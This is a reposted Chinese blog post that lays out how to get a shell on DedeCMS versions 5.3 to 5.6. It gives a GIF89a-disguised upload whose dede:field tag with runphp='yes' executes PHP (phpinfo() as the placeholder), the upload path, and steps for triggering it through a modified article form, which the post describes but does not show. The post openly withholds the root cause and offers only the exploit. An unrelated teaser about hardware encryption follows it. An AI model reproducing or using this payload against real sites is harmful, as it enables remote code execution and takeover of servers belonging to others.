【转载】dedecms v5.3-v5.6 Get Shell 0day

此0day已经出现了相当长一段时间，今天配合小龙同学提供的日志看了下代码，了解了漏洞成因。大多同学对成因不感兴趣，这儿就只公布利用方法。

Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
保存为1.gif

构造如上表单，上传后图片保存为/uploads/userup/3/1.gif

发表文章，然后构造修改表单如下：

红色部分都 是需要注意的地方，得根据实际情况进行对应修改。
修改完成后查看文章即可。
文章来源于lcx.cc:【转载】dedecms v5.3-v5.6 Get Shell 0day

相关推荐: 【文章】10.5 硬件加密与软件加密 - 加密盒

10.5 硬件加密与软件加密 硬件     直到最近，所有加密产品都是特定的硬件形式。这些加/解密盒子被嵌入到通信线路中，然后对所有通过的数据进行加密。虽然软件加密在今天正变得很流行，硬件仍是商业和军事应用的主要选择。例如，NSA只对硬件加密授权使用。为什么这…